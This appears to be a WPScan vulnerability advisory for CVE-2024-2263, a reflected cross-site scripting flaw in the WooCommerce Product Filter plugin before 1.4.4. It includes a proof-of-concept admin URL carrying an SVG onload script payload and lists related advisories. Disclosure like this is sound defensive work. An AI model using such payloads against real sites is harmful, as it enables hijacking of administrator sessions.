WooCommerce Product Filter < 1.4.4 – Reflected XSS | CVE 2024-2263 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open the URL below (the filter with the slug test1 needs to exist):

https://example.com/wp-admin/admin.php?page=wpf_search&action=delete&paged=1&wpf_post[]=test1&wpf_post[]=<svg/onload=alert(/XSS/)>&action2=delete

Affects Plugins

themify-wc-product-filter

Fixed in 1.4.4

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Submitter

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

ec092ed9-eb3e-40a7-a878-ab854104e290

Timeline

Publicly Published

2024-03-11 (about 2 months ago)

Added

2024-03-11 (about 2 months ago)

Last Updated

2024-03-11 (about 2 months ago)

Other

Published

Title

Published

2014-08-01

Title

Dexs PM System 1.0.1 - Private Message subject Parameter Stored XSS

Published

2023-02-15

Title

Click to Call or Chat Buttons < 1.5.0 - Admin+ Stored XSS

Published

2022-07-09

Title

Ecwid Shopping Cart < 6.10.23 - Insufficient Access Control

Published

2019-09-16

Title

Simple Fields <= 1.4.11 - Unauthenticated Stored Cross-Site Scripting (XSS)

Published

2023-08-10

Title

Post Timeline < 2.2.6 - Reflected XSS